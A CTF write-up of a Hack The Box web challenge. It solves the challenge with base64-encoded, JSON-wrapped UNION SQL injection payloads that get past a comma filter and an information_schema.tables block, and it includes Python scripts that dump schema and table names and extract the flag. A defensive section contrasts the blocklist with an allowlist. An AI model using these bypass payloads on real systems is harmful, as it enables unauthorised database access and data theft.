We are given a website that immediately throws an error. The first error says "obj" does not exist, so it seems we need to provide it through a variable named "obj"; passing obj as a GET parameter, we can see the first error disappears.
The second error needs a bit of reading: it says there is a non-object 'ID', so it seems we have to provide "ID" as well, but differently from "obj". Reading a little about data types, I saw that we can pass an object value by passing JSON…
reference: https://forum.getkirby.com/t/trying-to-get-property-of-non-object-error/3486
We could do something like {"ID":"1234"}, but it seems that is not how it is passed; in the browser's Inspect view there is a hint.
base64_encode($data), so it seems we have to convert the payload to base64 first.
Now there is no error, but there is no output either… here I started getting stuck, tried many things, and finally… I found something with ' (a single quote): changing the value of ID to ' gives us an error again.
A mysqli_fetch_assoc() error. It seems we have to do SQLi. After some trial and error I found something. (From here on I'll do it through Python because… converting to base64 over and over is tiring .-.)
```python
# seems like they block , (comma)
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT 1,2\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
Trying things out, I got an error when using , (comma).
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Searching PayloadsAllTheThings, we can use a comma bypass; using that…
```python
# "2" seems to be printed (bypass comma)
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
You can see the output prints the "2" part. First things first: find out the database name.
```python
# get database names
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT schema_name FROM information_schema.schemata)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
outputs = flag.find_all('h4')
for output in outputs:
    print(output.get_text())
```
There is a suspicious database 'ezpz'; next I wanted to find its table names.
```python
# blocked again by waf but...
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM information_schema.tables)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
You can see we are blocked again, but…
```python
# this doesn't get blocked... so maybe information_schema.tables is blocked
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())
```
By not using information_schema.tables we get an ordinary mysqli error rather than one from the WAF. Looking at PayloadsAllTheThings again, there is also a way to bypass information_schema.tables.
```python
# get table names (bypass information_schema.tables)
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM mysql.innodb_table_stats)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
outputs = flag.find_all('h4')
for output in outputs:
    print(output.get_text())
```
We get FlagTableUnguessableEzPZ as the table name. Now we just need to dump its contents.
```python
# final payload
import base64
import requests
from bs4 import BeautifulSoup as bs

url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT * FROM ezpz.FlagTableUnguessableEzPZ)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.h4.get_text())
```
Flag: HTB{T0oE4syP34syL4m3SQLiF!lt3rs}
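As an added example (not part of the original writeup), a defender-side look at the pattern this challenge relies on: the `obj` parameter is unwrapped the way the application does, and the `ID` value is run through a blocklist modelled on what the writeup inferred (comma and information_schema.tables rejected) and then through a positive allowlist, which shows why the comma-free JOIN payload slips past the former but not the latter. The filter rules, the `ID` format and the request paths are constructed for this example; the challenge's real filter is not shown on the page.

```python
import base64
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

# Stand-in for the filter the writeup infers (rejects a comma and
# information_schema.tables); constructed here, the real one is not on the page.
BLOCKLIST = (",", "information_schema.tables")
# Positive rule: the only ID this endpoint needs is a short numeric id.
ID_ALLOWED = re.compile(r"^[0-9]{1,10}$")

def encode_obj(obj):
    # Build ?obj=<base64(JSON)> the way the writeup's script does, URL-encoded.
    b64 = base64.b64encode(json.dumps(obj).encode()).decode()
    return "/?obj=" + quote(b64, safe="")

def decode_obj(path):
    # Unwrap the parameter the way the application does; None if malformed.
    raw = parse_qs(urlsplit(path).query).get("obj", [None])[0]
    if raw is None:
        return None
    try:
        return json.loads(base64.b64decode(raw, validate=True))
    except ValueError:
        return None

def blocklist_blocks(id_value):
    # True when the inferred blocklist would reject this ID.
    lowered = str(id_value).lower()
    return any(bad in lowered for bad in BLOCKLIST)

def allowlist_accepts(id_value):
    # True only for a digit string; everything else is rejected outright.
    return isinstance(id_value, str) and ID_ALLOWED.fullmatch(id_value) is not None

def triage(path):
    # (id_value, blocked_by_blocklist, passes_allowlist) or None if no ID.
    obj = decode_obj(path)
    if not isinstance(obj, dict) or "ID" not in obj:
        return None
    id_value = obj["ID"]
    return (id_value, blocklist_blocks(id_value), allowlist_accepts(id_value))

# Constructed requests: a normal lookup, the comma payload the filter catches,
# and the comma-free JOIN payload from the writeup that it lets through.
SAMPLE_REQUESTS = [
    encode_obj({"ID": "1234"}),
    encode_obj({"ID": "'UNION SELECT 1,2"}),
    encode_obj({"ID": "'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#"}),
]
```

Running `triage` over `SAMPLE_REQUESTS` shows the third request passing the blocklist while failing the allowlist, which is the gap the writeup exploited.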
Forgotten notes:
"bs" in the Python code is "BeautifulSoup" from the bs4 library.
Full journey here:
```python
#!/usr/bin/env python3
import base64
import requests
from bs4 import BeautifulSoup as bs

# first testing with object 'ID'
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"1234\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())

# found the holy grail with '
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())

# seems like they block , (comma)
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT 1,2\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())

# "2" seems to be printed (bypass comma)
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())

# get database names
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT schema_name FROM information_schema.schemata)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
outputs = flag.find_all('h4')
for output in outputs:
    print(output.get_text())

# blocked again by waf but...
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM information_schema.tables)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())

# this doesn't get blocked... so maybe information_schema.tables is blocked
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.center.get_text())

# get table names (bypass information_schema.tables)
url = "http://docker.hackthebox.eu:31252/?obj="
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name FROM mysql.innodb_table_stats)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
outputs = flag.find_all('h4')
for output in outputs:
    print(output.get_text())
print("")

# final payload
payload = base64.b64encode(b"{\"ID\":\"'UNION SELECT * FROM (SELECT 1)a JOIN (SELECT * FROM ezpz.FlagTableUnguessableEzPZ)b#\"}").decode()
send = url + payload
result = requests.get(send)
flag = bs(result.text, 'html.parser')
print(flag.h4.get_text())
```